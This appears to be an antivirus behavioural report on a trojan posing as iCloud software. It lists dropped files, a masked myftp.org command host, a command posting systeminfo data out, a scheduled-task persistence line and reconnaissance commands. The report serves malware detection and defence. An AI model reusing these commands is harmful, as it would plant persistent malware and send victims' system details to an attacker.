Техническая информация
- '<SYSTEM32>\taskkill.exe' /f /im IcloudSetup.exe
- '<SYSTEM32>\taskkill.exe' /f /im IcloudMonitor.exe
- %TEMP%\7ZipSfx.000\iclouds.cmd
- %TEMP%\7ZipSfx.000\ipad.system
- %TEMP%\7ZipSfx.000\IcloudSecurity.lnk
- %HOMEPATH%\IcloudSecurity\Icloud.exe
- %TEMP%\7ZipSfx.001\icloud.cmd
- %TEMP%\7ZipSfx.001\IcloudSetup.exe
- %TEMP%\7ZipSfx.001\Security_icloud.ini
- %HOMEPATH%\IcloudSecurity\Security_icloud.ini
- %TEMP%\7ZipSfx.001\system32.ini
- %TEMP%\7ZipSfx.001\icloud.exe
- 'ar####rt.myftp.org':80
- http://ar####rt.myftp.org/
- DNS ASK ar####rt.myftp.org
- ClassName: '' WindowName: ''
- '%HOMEPATH%\IcloudSecurity\Icloud.exe'
- '%TEMP%\7ZipSfx.001\IcloudSetup.exe' --post-data="comp=CRNJEUFU&id=20.04_CRNJEUFU_ECHOisoff.&sysinfo=Host Name: CRNJEUFU+###OS Name: Microsoft Windows XP Professional+###OS Version: ...
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.000\iclouds.cmd" "
- '<SYSTEM32>\schtasks.exe' /Create /sc MINUTE /mo 5 /f /tn Icloud /tr "%HOMEPATH%\IcloudSecurity\Icloud.exe"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.001\icloud.cmd" "
- '<SYSTEM32>\cmd.exe' /c vol c:
- '<SYSTEM32>\systeminfo.exe'